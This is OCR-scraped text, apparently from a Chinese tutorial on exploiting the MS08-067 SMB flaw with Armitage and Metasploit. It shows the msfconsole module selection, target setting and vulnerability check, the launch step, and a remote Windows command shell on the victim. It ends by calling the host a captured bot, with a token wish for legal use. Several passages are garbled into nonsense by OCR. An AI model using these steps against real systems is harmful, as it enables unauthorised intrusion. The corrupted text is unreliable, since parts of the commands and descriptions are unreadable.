===== Checking windows/smb/ms08_067_netapi ===== use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.105 RHOST => 192.168.1.105 msf exploit(ms08_067_netapi) > check r*l Wprifv,i nn unlnpr^hlp ctAt|iS . . . (path: 0x0000005a) [+] The target is vulnerable. ===== Checking windows/smb/mslO_061_spoolss : msf eiploit(timbuktu_plughntconmandbof) > | 这时,我们再在目标主机上点右键,选择“Attack-smb-ms08_067_netapi",将 弹出图14的exploit配置窗口,直接默认,A“Launch”。 Microsoft Server Service Relative Path Stack Corruption This module exploits a parsing flaw in the path canonicalcation code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP farnpfs <^ppm tn hanrilp mnltinlp surrp<isfijl PKnloitation pvpnts. hut 700^ tarnpts will [Console X nmap X Check Exploits X cmcJ.exe 1332@1 X | C:\WIND0WS\system32> ipconfig Windows IP Configuration Ethernet adapter Local Area Connection Connection-specific DNS Suffix IP Address. ......... Subnet Hask ......... Default Gateway ....... .! 192.168.1.105 .:255.255.255.0 ,:192.168.1.1 C:\WIND0WS\system32> |_ 我们已经成功将一台存在ms08-067的机器沦为肉鸡了。Armitage的全自动化非常有助 于管理员对主机的漏洞测试,但希望用于合法用途:)。 |
